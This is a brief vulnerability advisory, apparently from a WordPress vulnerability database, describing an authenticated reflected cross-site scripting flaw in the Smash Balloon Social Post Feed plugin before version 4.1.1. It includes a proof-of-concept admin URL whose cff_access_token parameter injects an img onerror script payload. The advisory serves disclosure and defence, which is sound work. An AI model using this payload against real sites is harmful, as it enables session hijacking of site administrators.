Smash Balloon Social Post Feed < 4.1.1 - Authenticated Reflected Cross-Site Scripting (XSS)

2021-12-1600:00:00

Krzysztof Zając

232

0.001 Low

EPSS

Percentile

30.3%

The plugin was affected by a reflected XSS in custom-facebook-feed in cff-top admin page.

http://127.0.0.1:8001/wp-admin/admin.php?page=cff-top&cff_access_token=xox%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%281%29%3E&cff_final_response=true

0.001 Low

EPSS

Percentile

30.3%

Related for WPEX-ID:AE1AAB4E-B00A-458B-A176-85761655BDCC